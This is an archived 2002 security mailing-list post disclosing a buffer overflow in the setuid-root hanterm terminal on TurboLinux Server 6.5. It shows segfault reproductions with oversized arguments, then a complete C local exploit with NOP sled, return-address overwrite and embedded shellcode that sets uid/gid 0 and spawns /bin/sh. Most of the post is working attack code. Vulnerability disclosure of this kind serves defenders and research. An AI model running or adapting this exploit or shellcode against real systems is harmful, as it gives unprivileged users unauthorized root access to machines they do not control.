OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: xperc (xperchotmail.com)
Date: Thu Feb 07 2002 - 04:33:27 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Hi,I'm xperc.

      hanterm is Hangul terminal for X. it is based on the
    xterm in XFree86. The hanterm binary is default
    installed with setuid root permissions for TurboLinux
    Server 6.5. but contains insecure code with allows
    unprivileged local users to obtain root access on the
    local system.

    $which hanterm
    /usr/bin/X11/hanterm
    $ls -l /usr/bin/X11/hanterm
    -rws--x--x 1 root root 166100 03 13
    2001 /usr/bin/X11/hanterm*
    $rpm -qf /usr/bin/X11/hanterm
    hanterm-xf-p18-3.3-6
    $hanterm -fn `perl -e 'print "a"x100'`
    Segmentation fault
    $hanterm -hfb `perl -e 'print "a"x8000'`
    Segmentation fault
    $hanterm -hfn `perl -e 'print "a"x8000'`
    Segmentation fault
    ...etc

    /* hanterm_exp.c
     *
     * local exploit for hanterm
     * .. tested in TurboLinux Server 6.5 (Japan)
     *
     * thanks my Japanese friend kaju(kaijyu)
     * and Japanese hacker UNYUN.
     *
     * by xperchotmail.com
     * 2002/02/07
     */

    #include <stdio.h>

    #define NOP 0x90
    #define MAXBUF 88
    #define RETOFS 84
    #define SHELL_OFS 22
    #define ESP_OFS -0xe38

    unsigned int get_esp()
    {
            __asm__("mov %esp,%eax");
    }

    int main()
    {
            static char shellcode[]={
                0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
                
    0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
                0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
                
    0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
                0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
                0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
                0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
            };
            unsigned int retadr;
            char buf[MAXBUF];
            int i;
            
            memset(buf,NOP,MAXBUF);

            retadr=get_esp()+ESP_OFS;
            printf("Jumping address = %p\n",retadr);

            for(i=RETOFS-32;i<RETOFS+32;i+=4){
                    buf[i] =retadr&0xff;
                    buf[i+1]=(retadr>>8)&0xff;
                    buf[i+2]=(retadr>>16)&0xff;
                    buf[i+3]=(retadr>>24)&0xff;
            }
            strncpy(buf+SHELL_OFS,shellcode,strlen
    (shellcode));
            //buf[MAXBUF-1]='\0'; faint!:-(
            execl("/usr/bin/X11/hanterm","hanterm","-
    fn",buf,(char *)0);
    }